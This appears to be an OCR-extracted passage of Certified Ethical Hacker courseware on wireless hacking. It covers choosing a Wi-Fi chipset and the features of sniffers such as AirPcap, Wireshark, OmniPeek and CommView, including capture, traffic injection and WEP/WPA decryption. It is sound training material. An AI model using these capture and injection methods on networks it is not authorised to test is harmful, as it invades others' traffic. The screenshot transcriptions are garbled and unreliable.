manufacturers. Knowing the card manufacturer and model is not sufficient to choose the Wi-Fi card. The user should know about the chipset inside the card. Most of the chipset manufacturers don't want to reveal what they use inside their card, but for

Module 15 Page 2268

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

the users it is critical to know. Knowing the wireless chipset manufacturer allows the users to determine the operating system that it supports, required software drivers, and the limitations associated with them. D e t e r m in e th e c h ip s e t o f th e W i- F i c a r d The user first needs to determine the wireless chipset inside the card that they are thinking to use for their WLAN. The following are the techniques that can be used to determine the chipset inside a Wi-Fi card: 9 9 Search the Internet. You may have a look at Windows driver file names. It is often the name of the chipset or the driver to use. Check the manufacturer's page. You can physically see the wireless chip on some cards such as PCI. Often the chipset number can also be observed. You can use the FCC ID Search to lookup detailed information of the device in case if the device consist a FCC identification number on the board. It gives the information of the card about the manufacturer, model and the chipset.

9 9

9

Sometimes the card manufacturers change the chipset inside the card while keeping the same card model number. This is usually called "card revision" or "card version." So, while determining the chipset of the Wi-Fi card, make sure to include the version/revision. The chipset determining ways may vary from one operating system to the other. You may visit http://madwifi-proiect.org/wiki/Compatibilitv for compatibility information. V e r if y th e c h ip s e t c a p a b ilit ie s ♦ After choosing a Wi-Fi card, check or verify whether the chipset is compatible with your operating system and check whether it is meeting all your requirements. If the chipset is not compatible with the OS or not meeting the requirement criteria, then change either the OS or the chipset depending on the requirement. D e t e r m in e th e d r iv e r s a n d p a tc h e s r e q u ir e d — ‫׳‬ You can determine the drivers required for the chipset using the drivers section and determine the patches required for the operating system.

After determining all these considerations of a chipset the user can find a card that uses that particular chipset with the help of compatible card list.

Module 15 Page 2269

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi USB Dongle: AirPcap
J J AirPcap adapter captures full 802.11 data, management, and control frames that can be viewed in Wireshark for in-depth protocol dissection and analysis AirPcap software can be configured to decrypt WEP/WPA-encrypted frames

CEH

AirPcap Control Panel

^
®

F e a tu re s
It provides capability for simultaneous multi-channel capture and traffic aggregation
Mode( AjrPcap Nx Transm it yes Interface AiPoap USB wwetess capture adaptef n r. 00 v]

L =l!
Blink Led j

Settings Keys_________________________________________________

Medw: 802.11 /b/jj/n

© It can be used for traffic injection that help in assessing the security of a wireless network © AirPcap is supported in Aircrack-ng, Cain and Able, and W ireshark tools 9 A irPcapReplay, included in the AirPcap Softw are Distribution, replays 802.11 network traffic that is contained in a trace file

4

Basic Conflation Channel 2412MHz(BG 1) 0 v FCS Fiei All Flames v v

\ y \ Include 80211 FCS in Fram es

Extension Channel CepmeTjue

802110n(y

Reset Configuration

http://www.riverbed,com
Copyright © by IC - C o u cil. All Rights Reserved. Reproduction is Strictly Prohibited.

*

W i-Fi USB Dongle: AirPcap
Source: http://www.riverbed.com

AirPcap captures full 802.11 data, management, and control frames that can be viewed in Wireshark providing in-depth protocol dissection and analysis capabilities. All AirPcap adapters can operate in a completely passive mode. In this mode, the AirPcap adapter can capture all of the frames that are transferred on a channel, not just frames that are addressed to it. This includes data frames, control frames and management frames. When more than one BSS shares the same channel, it can capture the data, control, and management frames from all of the BSSs that are sharing the channel within range of the AirPcap adapter. AirPcap adapters capture traffic on a single channel at a time. The channel setting for this can be changed using the AirPcap Control Panel, or from the "Advanced Wireless Settings" dialog in Wireshark. Depending on the capabilities of a specific AirPcap adapter, it can be set to any valid 802.11 channel for packet capture. It can be configured to decrypt WEP-encrypted frames. An arbitrary number of keys can be configured in the driver at the same time, so that the driver can decrypt the traffic of more than one access point simultaneously. W PA and WPA2 support is handled by Wireshark. When monitoring on a single channel is not enough, multiple AirPcap adapters can be plugged into your laptop or a USB hub and provide capability for simultaneous multi-channel capture and traffic aggregation. The AirPcap driver provides support for this operation through MultiChannel Aggregator technology that exports capture streams from multiple AirPcap adapters as

Module 15 Page 2270

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

a single capture stream. The Multi-Channel Aggregator consists of a virtual interface that can be used from Wireshark or any other AirPcap-based application. Using this interface, the application receives the traffic from all installed AirPcap adapters, as if it was coming from a single device. The Multi-Channel Aggregator can be configured like any AirPcap device, and therefore can have its own decryption, FCS checking, and packet filtering settings. It can be used for traffic injection that helps in assessing the security of a wireless network. It is supported in Aircrack-ng, Cain and Able, and Wireshark tools. AirPcapReplay, included in the AirPcap Software Distribution, replays 802.11 network traffic and that is contained in a trace file.

AirPcap Control Panel
S e ttn g s Keys

L- - L5 1 1 ‫־־‬

In te r f a c e V

A ir P c a p U S B

w v e le s s c a p tu r e a d a p te r n r 0 0

B fc n k L e d

M odel

A «Pcap N x

T r a n s m it

yes

M ed a

80211

a/b/g/n

B a s i c C o n fig u r a t io n

Channel

2 4 1 2 M H z (B G

1)

v

@

In c lu d e 8 0 2 1 1

F C S in F r a m e s

E x te n s io n C h a n n e l

0

V

C a p tu re T y p e

80211

O n fc

V

F C S F ie r

A I Fram es

v

H e lp

R e s e t C o n fig u r a t io n

0 k

A p p ly

J

C ancel

FIGURE 15.39: AirPcap capturing 802.11 data

Module 15 Page 2271

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Packet Sniffer:W ireshark with AirPcap

r EH

W i-Fi Packet Sniffer: W ireshark w ith AirPcap
Source: http://www.wireshark.org Wireshark is a network protocol analyzer. It lets userd capture and interactively browse the traffic running on a computer network. It is the de facto (and often de jure) standard across many industries and educational institutions. Features: © Live capture and offline analysis © Standard three-pane packet browser © Multi-platform: Runs on Windows, Linux, OS X, Solaris, FreeBSD, NetBSD, and many others © Captured network data can be browsed via a GUI, or via the TTY-mode TShark utility © Display filters © VoIP analysis © Read/write many different capture file formats: tcpdump (libpcap), Pcap NG, Catapult DCT2000, Cisco Secure IDS iplog, Microsoft Network Monitor, Network General Sniffer® (compressed and uncompressed), Sniffer® Pro, and NetXray®, Network Instruments

Module 15 Page 2272

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Observer, NetScreen snoop, Novell LANalyzer, RADCOM WAN/LAN Analyzer, Shomiti/Finisar Surveyor, Tektronix K12xx, Visual Networks Visual UpTime, WildPackets EtherPeek/TokenPeek/AiroPeek, and many others 9 9 Capture files compressed with gzip can be decompressed on the fly Live data can be read from Ethernet, IEEE 802.11, PPP/HDLC, ATM, Bluetooth, USB, Token Ring, Frame Relay, FDDI, and others (depending on your platform)

© Decryption support for many protocols, including IPsec, ISAKMP, Kerberos, SNMPv3, SSL/TLS, WEP, and WPA/WPA2 Q 9 Coloring rules can be applied to the packet list for quick, intuitive analysis Output can be exported to XML, PostScript, CSV, or plaintext
Capturing from AirPcap USB wireless capture adapter nr. 00 - Wireshark

_

a

x

C a p tu r eg n a ly :< Jta tr c tic s T e le p h o n y Jo o * ! f c t e lp E* £ < * n < E< E<•*□ * ® ‫ * *יי‬a i « « a » kcsxea ^ ♦ + * ? 2 - E ip rtiu o n ... C le a rA p p ly All Frames h a n n e lO ffs e t 0 0FCS W fr e ir s sS e ttin g }... D e c r y p tio nK e y s .‫״‬ 8 0 2 .1 1C h a n n e l: 2 4 1 2 [B G1 ] ‫ פ‬C D e s tin a tio n Protocol N o . T im * S o u r c e In fo

1 1
frj fr i fr j fr j fr j fn f n fn fr j fr j fr i fn fn fr j fr j
sn

F ille r

2 2 7 7 1 0 0 . 7 9 1 9 2 9 b 8 : a 3 : 8 6 : 3 e : 2 f : 37 2 2 7 8 1 0 0 .8 9 2 5 5 0 b 8 : a 3 : 8 6 : 3 e : 2 f :3 7 2 2 7 9 1 0 0 .9 9 4 7 9 5 b 8 : a 3 : 8 6 : 3 e : 2 f : 37 2 2 8 0 1 0 1 .0 0 2 2 8 9 S h a n g h a i_ 2 5 : 6 3 : 1 0 2 2 8 1 1 0 1 .0 9 7 1 6 8 b 8 : a 3 : 8 6 : 3 e : 2 f :3 7 2 2 8 2 1 0 1 .1 0 4 7 8 8 S h a n g h a 1 _ 2 5 : 6 3 : l O 2 2 8 3 1 0 1 .1 7 2 9 2 1 N e t g e a r _ a e : 2 4 : c c 2284 1 0 1 .1 9 9 5 6 4 b 8 : a 3 : 8 6 : 3 e : 2 f :3 7 2 2 8 5 1 0 1 .2 0 7 1 6 2 s h a n g h a i _ 2 5 : 6 3 : 1 0 2 2 8 6 1 0 1 .2 0 7 9 1 0 S h a n g h a i _ 2 5 :6 3 : 1 1 2 2 8 7 1 0 1 .2 0 9 5 3 3 S h a n g h a i _ 2 5 : 6 3 : 1 3 2 2 8 8 1 0 1 . 3 0 2 0 4 5 b 8 : a 3 : 8 6 : 3 e : 2 f : 37 2 2 8 9 1 0 1 .3 7 7 6 7 4 N e t g e a r . a e : 2 4 : c c 2 2 9 0 1 0 1 .4 1 2 0 6 7 S h a n g h a i _ 2 5 : 6 3 : 1 0 2 2 9 1 1 0 1 .4 1 3 6 7 2 s h a n g h a i _ 2 5 : 6 3 : 1 2 2 2 9 2 1 0 1 .5 3 9 6 9 9 9 8 : e 2 : C b : 3 5 : d b :3 9 2293 1 0 1 . 582580 N e tg e a r _ a e :2 4 :c c 2 2 9 4 1 0 1 .8 2 3 4 7 1 S h a n g h a i_ 2 5 : 6 3 : 1 2 • Fra m e • IE E E * IE E E 1: 85 b y te s on w ir e la s (6 8 0

B ro a d c a s t B ro a d ca st B ro a d ca st B ro a d c a s t B ro a d ca st B ro a d ca st B ro a d ca st B ro a d ca st B ro a d ca st B ro a d ca st B ro a d ca st B ro a d c a s t B ro a d ca st B ro a d ca st B ro a d ca st B ro a d ca st d 2 :ff:ff:f B ro a d ca st 85 b y te s

IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E IE E E

8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1 8 0 2 .1 1

Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon Beacon o a ta , Beacon Beacon (6 8 0 b its )

SN -609. S N —6 1 0 , SN — 611, SN -2269, SN -612,
sn

fn

-0 ,

F la g s • . F la g s - . F la g s - . F la g s * F la g s - . F F F F F F F F F F agsagsagsagsagsagsagsags. .F . agsags. , . , . . , . , ,

8 1 *1 0 0 , B I- 1 0 0 , 61-100, 61=100, 61-100, B I- 1 0 0 , B I- 1 0 0 , B I- 1 0 0 , 61-100, B I- 1 0 0 . B I- 1 0 0 . B I- 1 0 0 , B I- 1 0 0 .

S S S S

I I I

FN -O , FN -0, FN -0, FN -0,
fn

-2273,

-O ,

SN -1S30, SN -613, SN -2277, SN -2278, SN -2280,
sn

FN -0. FN -0, FN -0. FN -0, FN -0. FN -0, FN -0, FN -0. FN -0, FN -0, FN -0.

F la g s

S

-6 1 4 ,

F la g s

S

SN -1532, SN -2285, SN -2287, FN -9, SN -1535, SN -2303,

B I- 1 0 0 [K B I- 1 0 0 . B I- 1 0 0 . |

—1 5 3 4 ,

F la g s • .p .

fra n c , fra m e ,

.

B I- 1 0 0 ,

- 1

b its ),

c a p tu re d

8 0 2 .1 1 8 0 2 .1 1

O is a s s o c ia t e , w ir e le s s

F la g s :

...P .■ F . fra m e

m anagem ent

♦ * • !f o r m e d
0000 0010 0020 0030 0040 aO 1 2 020 9 640 0 d64 f 81 4 c

P a c l.e t:
00 20 5b a e 31 1 4 7 2 84 2 2 bO

IE E E

8 0 :. 11]
ed 7f 72 44 92 ff 41 47 00 4c a a Oc e a d8 do 7d 70 4 e 0 0 80 c 5 6 b 73 05 04 32 0 8 0 0 0 0 0 5 1 0 2 9 3e 04 41 do 48 63 04 20 . . ] . J .‫ ־‬. •A } p N . . H r c .K s ..c . 2 ........... A

. l".C.S. n A I/l (IA AM H A ifP c a pU S 8w ir e le s sc a p tu r ea d a p te rn r .0 0 :... P a c k e ts :2 5 7 8 D is p la y e d2 5 7 8M a r k e d ;0

e d 77 24 c c 0 9 07 d9 fO 43 c2

bb fb 6 0 14 O e 65 0 0 04 2 4 83

d .l....e
. o r ........... d

.L.)>.

Profile Default

FIGURE 15.40: Wireshark with AirPcap capturing network traffic

Module 15 Page 2273

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Packet Sniffer: Cascade Pilot
J It m easures w ireless channel utilization J It helps in Identifying rogue w ireless n etw orks and stations J It isolates specific packets J It provides an interactive and visuallyoriented user interface
^TC*c/y«»orK*>*

C EH

-^ O U p M e S o u c w
)J C )o a«A ll T a b s G «ra3!‫׳‬v 3Sttnec

**‫•״‬
UDetad‫־‬

&J

& V* □

3 F CangMMni ‫ ־‬O BarA‫״‬ahO verT«ne O Sem eeR e sp o n seT im eb yW ebO t*eet. L ig h t* O

IH a g r•byT n d fc cT yp e

I

‫׳׳‬

‫ ׳‬/■ / / ‫* ׳‬ / ‫״‬

Copyright © b y EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i-Fi P a c k e t Sniffer: C a sc a d e Pilot
Source: http://www.riverbed.com Cascade Pilot Personal Edition (Wi-Fi pilot) is an analyzer for wired and wireless networks that revolutionizes the use of Wireshark. Fully integrated with Wireshark, Cascade Pilot Personal Edition capitalizes on users' existing expertise while dramatically increasing efficiency in identifying and diagnosing network problems. Wi-Fi Pilot does: 9 It measures wireless channel utilization from the data and spectrum points of view simultaneously It helps in identifying rogue wireless networks and stations It provides professional detailed reports

Q Q

Module 15 Page 2274

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

. *‫י־‬

1 Tim eControl Walchee1‫־‬ Reportng A (W de

Cascade Pilot (66 da y\ remaevng)

-1“ ■ verta

S
Add Trace

H o m e

• MFoMtl F.k

“^D»er>T*orK4>t*)*(
<«) »Ja‫׳‬ne Resdubor ■

O uM kSuat
ClCtonM T*,
Generd

V S u ty ^ M a a
D w ta Fites

Q G a m g S n n M
«‫ «ז׳‬O So rvK ef

4 k Detach

MreshaA

F I•

a

eh

efcOtotec! •bgN * O Network Usage b f Traffic Type

«# OevK*WPK0.41J742_;350021FE‫ ־‬.
Microsoft Corporator (2)
‫ ♦־‬M.cr s<yt Corporahcr

0

4► 1
2 SOU ■T ons

a e » > * ‫>« ״‬Oy»T1«» 512 PM)(‫_|»י‬
Q IP Corversebors * 12 PM) Is * IdJ Network Osage by Traftc Type 5 'i! ‫י‬

* ‫•’ ׳‬ ‫׳‬
&MS-Net»Oft n g

‫>ן‬

m

>

S t a r tS c o t c h
t CaRacerdy Used

v*

fflE
s Id)

0« »I,] Protocol C » s tr» fc / > o r •&t J Protocol O str»tvrt> o r B,!‫׳‬tes »?«I,) Protocol C * s tT » fe o J> c r -P*ch 6er*r«c

»0 0 u

3S »*u

4^ '

2 1 T | W
^ I • ‫י‬0 ‫ » ז ן ן ז ג‬4‫ ן ז‬h o »4‫ ן ? י‬i w i o r m j t *.

^ 802 ‫וד‬

LA N arc

fiefAC*

‫״׳‬j 6ar4jA»«f Usage

TK*m • ‫״‬ ‫־‬ ‫ גי‬Ccrtversabcns ^ Pf‫״‬ V ‫׳‬r^r<* •rvJ Error!
User

/‫✓ ׳‬

t- v

.4MJt, Seg‫׳‬r*rr M y s * (MSA)

Tfsrsac&cr Analysis

* //* *
-

‫׳‬

Cievert SelacfeaB 1125 29 18 17 - 33 15 ‫ל‬ft # 1 sec - M V M w

’ " 6 33

"

‫ ־‬:;‫ל‬

D n p / U b ’ D«,

Network lH a 9e by Tra#* Type on Reeltck PO e G6E fenwly Controller at 5:1 5 PM

Selected Chert Retetrve Network Usage

FIGURE 15.41: Cascade Pilot Screenshot

Module 15 Page 2275

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

(

Q N M k U M p s b r T r iftc T y p •

Bard»»dJh Over Tene

E v e n t s

1 A i l i* 0 __ (11

1, 1 1 1 1 ft

■ / !■ A .JI., a A K

■ I I

1
a

g p to u b o g

1

AA

S' ‫־‬ • All AAA

g ^ jn .r Q *-n

< Id l o f s

PeaKe* PCk G6€ Ferrrfy C or< roller

I

BJ--

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Packet Sniffer: O m niPeek I C EH
J J OmniPeek network analyzer offers real-time visibility and analysis of the network traffic from a single interface, including Ethernet, 802.11a/b/g/n wireless and VoIP It provides a comprehensive view of all wireless network activity showing each wireless network, the APs comprising that network, and the users connected to each AP

a j 3 a,.‫ *־‬.
j — : - 11 ! 1 ‫־‬ V

mUPMk*:> UmniK'fl‫׳‬

e 5:0kmc : ir ff 0 N1M»K) ITM U 0 • ***‫יי‬ Pb t
0 rrrr; c e;1 e*»aj n :r:

t‫»«־‬,.»r.. S-J08J

rr.r:

;7-0,d»v ‫נ‬-‫א‬4 ‫כ‬

‫י‬4 ‫נ‬,

4.HM tx1 n : n • .0 *T C »V 3 0 )
S.129.16) 4.4?.»j 4.(7.222 tllO U M ) 4 «:‫ננינל»ג‬ 4 «4 2 1 ‫גג<ינ‬ ‫ ל‬2:«2 2 « 0‫נ‬ ‫ י‬3 !:4 4 «::‫נ‬ ‫) י‬H I4 JW SIS 8 2 W0. 7(

v Mrv*> Uiponn :1st (0

10.0.1.2
10.9.1.{

1 2 ‫ג‬. 1‫י‬4.‫ג‬2.1«4 *4.121.22) . 1 4 9

1 0.0.1.1 10.0.1.1 1 0.0.1.1

: 100-1737 .

l»7.Si.(7.222

157.5(.(7.222 157.5(.(7.222 10.0.4.1 10.9.1.1

‫י‬.6 «»‫נ»מ‬
‫י‬.‫ מ «ו‬5 «‫נ‬ t 041C44W t

‫ י‬5 *2 * 00( ‫י‬6 » « ‫ יי‬0‫י‬

!re- :040,Oft- 4 4 3 . .fcP.. ..S-l

Stc- 4 4 3 ,D *t- U4C, .Ik..3. ,3...... 3 1 fee• 1 9 4 0 ,0 k* 4 4 3 , .A 4 0 .D ai- 4 4 3 . Jk-- .S-J

BJ tznanet raecctc 2.000

DuW M n (

h ttp://w w w . wildpackets. com
Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

U f..Y 'J (h

W i-Fi Packet Sniffer: O m niPeek
Source: http://www.wildpackets.com

_

__

_ _

_

_

___

____

_

OmniPeek network analyzer provides a graphical interface that the users can use to analyze and troubleshoot enterprise networks. It even offers Omreal-time visibility and analysis into every part of the network from a single interface, including Ethernet, Gigabit, 10 Gigabit, 802.11a/b/g/n wireless, VoIP, and Video to remote offices. Using OmniPeek's user interface and "top-down" approach to visualizing network conditions, the users can analyze, drill down and fix performance bottlenecks across multiple network segments. Highlights: Q Comprehensive network performance management and monitoring enterprise networks, including network segments at remote offices 9 of entire

Interactive monitoring of key network statistics in real-time, aggregating multiple files, and instantly drilling down to packets using the "Compass" interactive dashboard Deep packet inspection Integrated support for Ethernet, Gigabit, 10 Gigabit, 802.11a/b/g/n wireless (Including 3-stream), VoIP, Video, MPLS, and VLAN

9 9

Module 15 Page 2276

Ethical Hacking and Countermeasures Copyright © by EC-C0l1nCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9

Intuitive drill-down to understand which nodes are communicating, which protocols and sub-protocols are being transmitted, and which traffic characteristics are affecting network performance Complete voice and video over IP real-time monitoring including high-level multimedia dashboard, call data record (CDR), and comprehensive signaling and media analyses Application performance monitoring and analysis in the context of overall network activity including the ability to monitor application response time, round-trip network delay, server responsiveness, database transactions per second, and myriad other lowlevel statistics. An extensible requirements
Mt view captire send Monitor T ook

9

9

9

architecture

that

can

be

easily tailored

to

individual

network

- ‫■י־‬
: n# Window Help W iid P a c k c H 'S m n iP c e k

> *‫ ־‬t - H
Start •‫׳‬i j« !, jc u (( :V T

'< E

‫ י‬al h

b

h

< ; T !

4 1*

‫־‬a] □

!

,

w

0 .

J

; r >

Capture 1 x butter u u j* : fl1lr» \% *■‫ י‬Accept dll packets

4,000 fltnrd: 2.000

j— Start Copcuc —

0fka oucm kxi here Loc F' foe hot)

Oo911boards v*tACr< o a iv d M flpdr*

‫ ׳*׳‬N»IH J ‫׳‬. ‫־‬. ‫ ׳י‬I ‫»י‬
P4ck»t SC LT C * 1 ‫י‬ 2 3 4 5 6 7 ' 8 9 10 11 12 13 f ‫״‬ 16 17 18 19 20 21 22 23 24 25 2( 27 28 ' 29 30 1 0 .0 .0 .2 1 0 .0 .0 .2 1 7 3 .1 9 4 .3 6 .4 1 7 3 .1 9 4 .3 6 .4 1 0 .0 .0 .2 1 0 . 0 . 0 .2 7 4 .L 2 5 .1 2 e .1 3 9 1 0 .0 .0 .2 1 0 .0 .0 .2 1 0 .0 .0 .2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 7 3 .1 9 4 .3 6 .2 2 1 0 .0 .0 .2 1 0 .0 .0 .2 1 2 3 .1 7 6 .3 2 .1 5 4 7 4 .1 2 5 .L 2 C .1 8 9 1 0 .0 .0 .2 1 0 .0 .0 .2 1 0 .0 .0 .S 1 5 7 .5 6 .6 7 .3 2 2 1 0 .0 .0 .5 1 G .0.G .S 1 6 7 .5 6 .6 7 .2 2 2 1 5 7 .5 6 .6 7 .2 2 2 1 0 .0 .0 .5 1 0 .0 .0 .2 1 0 .0 .0 .2 1 7 3 .1 9 4 .3 6 .4 i 1 7 3 .1 9 4 .3 6 .4 j 1 0 .0 .0 .2 LG.0 .0 .2 1 7 3 .1 9 4 .3 6 .4 1 7 3 .1 9 4 .3 6 .4 j 1 0 .0 .0 .2 1 7 4 .1 2 5 .1 2 3 .1 8 9 1 7 3 .L 9 4 .3 6 .2 2 J 1 7 3 .1 9 4 .3 6 .2 2 i 1 0 .0 .0 .2 j 1 0 .0 .0 .2 1 0 .0 .0 .2 1 0 .0 .0 .2 j 1 0 .0 .0 .2 1 L 7 3 .L 9 4 .3 6 .2 2 L23. L76. 3 2 .1 5 4 LG.0 .0 .2 j 1 0 .0 .0 .2 1 74.L 25.12B .1C 9 1 7 7 .2 4 6 .4 7 .1 5 3 1 5 7 .5 6 .6 7 .2 2 2 j 1 0 .0 .0 .5 1 5 7 .5 6 .6 7 .2 2 2 1 5 7 .5 6 .6 7 .2 2 2 s LG.0 .0 .5 1 0 .0 .0 .5 1 5 7 .5 6 .6 7 .2 2 2 1 7 3 .1 9 4 .3 6 .4 ____‫ נ‬1 7 3 .L94.3 6 .4 pugs s» 95 95 95 S5 64 64 163 64 2370 91 64 64 64 lie 936 64 64 70 163 64 64 70 70 64 164 1516 1518 64 es 64 R1>U3/#Ttnr C. 0X C 0 3 X 0 0 .0 X 6 5 5 X 0 C .0 X 2 0 0 X 0 C .031C 45X 0 C .0 3S 625X 0 0 .0 3 9 6 4 5 X 0 C .7 7 1222X 0 C.8 1 1 8 9 3 X 0 4 .3 1 8 2 3 5 X 0 4 . 31E3010C0 4.3 5 2 1 2 7 X 0 4 .3 5 4 1 4 7 X 0 4.35S C 64X 0 4 .5 3 5 2 9 4 X 0 4 .5 5 6 9 6 3 X 0 4 .5 3 7C 00X 0 6.097C 97X 0 6 .1 X 1 1 3 X 0 6 .9 2 2 6 4 5 X 0 6 .9 5 2 1 3 7 X 0 T .2 1 6 2 2 3 X 0 7 .3 0 1 4 4 9 X 0 7 . 5554 35 X 0 7.5 5 C 9 2 5 X 0 7 .5 X 2 9 0 X 0 7.8S C S 86X 0 7 .8 5 2 2 0 7 X 0 7 .8 5 3 3 3 5 X 0 8.001C 46X 0 6.001C 9 0 X 0 Protocol HTTPS HTTPS HTTPS ■ITT?3 HTTPS HTTPS 3ITP3 HITPS HITPS HTTPS HTTP3 HITPS ■DTPS HTTPS HTTPS HITPS HIT? HIT? HTTPS 3TTP3 HIT? HITPS HTTP5 HTTPS HTTPS HITPS HITPS HTTPS HTTPS HITPS

I►!
Surwrvry Cxprit Src■ 1 7 6 9 ,DSC■ 4 4 3 ,.A P .. . .S - 1 4 B 6 ... Src■ 17T0,D 3t■ 4 4 3 ,.A P .. .,3 » 3 8 6 5 ... S r c - 4 4 3 , 01770 - ‫ ב כ‬, . AP. . . . s - 7 9 6 ... S r c - 4 4 3 ,D as- 1 7 6 9 ,.A P .. . , 3 - 3 0 3 3 . . . Src= 1 7 6 9 ,0 8 t= 4 1 3 ,. A . . . . , S - 1 4 2 6 .. . Src= 1 7 7 0 ,D3t= 4 4 3 ,. A . . . ..3 = 3 8 6 5 ... Src= 4 4 3 ,D3t= 1 0 5 3 ,.A ? .. ..3 = 1 7 0 9 ... . . 3Src- 1 0 8 3 , 4 4 3 - ‫ ב בס‬, A. . .9 5 6 ... Src= 10SL ,D st= 4 4 3 ,.A P .. . , S=. 0 0 7 ... Src= 1 0 5 1 ,D3t= 4 4 3 ,.A P .. - .5= 0 D 7 ... Src= 4 4 3 , 01051 =‫ ב ב‬, . A. . . ..3 = 9 4 . . . S r c - 4 4 3 , 01051 - ‫ ב כ‬, . A. . . . , 3- 9 4 . . . S r c - 4 4 3 , D31051 - ‫ ־‬, . A. . . . , S- 9 4 . . . Src= 443,D St= 1 0 5 1 ,.A P .. • .5= 94. . . Slow Se r v er R esponse Time (C Src= 4 4 3 ,D3u= 1 0 5 1 ,•A ? .. -.3 = 94. . . S r c - 105L, 443 - ‫ ב בס‬, . A. . . . , S- 4 0 0 7 ... C PORI-1728 . Src= 80, 1723 =‫ ב » ס‬, • A. . . . , S=‫ ״‬9 9 7 ... 5rc= 4 4 3 ,D3t= 1 0 8 3 ,.A P .. .,3 = 1 7 0 9 ... 3rc= 1 0 6 3 ,0 3t= 4 4 3 ,. A . . . ..3 = 9 5 6 ... C PORI-172" . Src= 1040 , ‫ =ב*ס‬, 443 ------ S .,S = 1 8 3 0 ... 5rc= 4 4 3 ,D 9ts 1 0 4 0 ,.A ..5 - .5= 5 1 9 ... S rc* 1 0 4 0 ,Oat* 4 4 3 ,. A . . . . , 3 - 1 8 3 0 . . . Src- 1 0 4 0 , 4 4 3 - ‫ב גס‬, . ,.3 AP. -1 8 . 3 0 ... , SS r c - 4 4 3 , 1 0 4 0 - ‫ ס‬0 ‫ ב‬, . A. . . S 1 9 ... Slow S erver Rcaponrc Ti m (0 sr c■ 4 4 3 ,DSt■ 1 0 4 0 ,.A .. . •. 5■ 5 1 9 ... Src■ 1 0 4 0 ,D 3 t- 443, . A ... . , 3 - 1 8 3 0 . . . Src- 1 7 7 0 , 4 4 3 - ‫ב גס‬, . ,. S AP. - 3 .8 6 3 .. . Src- 1 7 7 0 , 4 1 3 - ‫ב גס‬, . ,. S A.-R. 3 8 6 9 .. . ■‫ ע‬r»hernrt Petkriv ?.000 D uinton 001:25 0 ,Jcne

1 1 hers Expert

fla t
Web Servers

*rxjes
Voice & Video

Visuals

^2e^M ap

^otoccb S jrw r

Mr fo r Help, press f ‫י‬

FIGURE 15.42: OmniPeek analyzing enterprise network

Module 15 Page 2277

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Packet Sniffer: C om m View for Wi-Fi
J CommView for Wi-Fi is designed for capturing and analyzing network packets on wireless 802.11a/b/g/n networks

CEH

F e a tu re s
6 It gathers information from the wireless adapter and decodes the analyzed data s It can decrypt packets utilizing user-defined W E P or WPA-PSK keys and decode them to the lowest layer, with full analysis of the most widespread protocol

. CommView for WiFi -D Link AirPremier DWI-AG530 Wireless PCI Adapter
File Search View Tools Settings R iies Help

'Ig S ^ lR F R F • ■ ?
(>) Nodes | (m ) Channels | ^ Latest IP Connections ^ Packets

j

Logging | ^

Rules |

Broadcast 01:00:5E:... 33:33:00:... Broadcast Broadcast 0x0000 0x0010 0x0020 0x0030 0x0040 08 00 45 4 1 2C 0 0 0 0 OF 3D 0 2 B 3 9 6 OC IC 00 00 A 8 00 01 0 18 40 D5 0 20

N/A 192.168.0.4 158.22.250.0 192.168.0.4 N/A 00

N/A 239.255.2... 0.0.0.12 192.168.0.1 N/A 14 00 AS 2D 6 1 00 00 08

N/A 1900 1900 N/A N/A 2F 00

Quick Filter Open Packet(s) m New Window

1 9 -0 5 00

A I-A A AA 0 3

Copy Address Copy Packet Send Packet(s) Save Packet(s) As ... SmartWhois Clear Packet Btifer

4F 2 ................................................................................................

co
50

Raw contents of the packet

«5

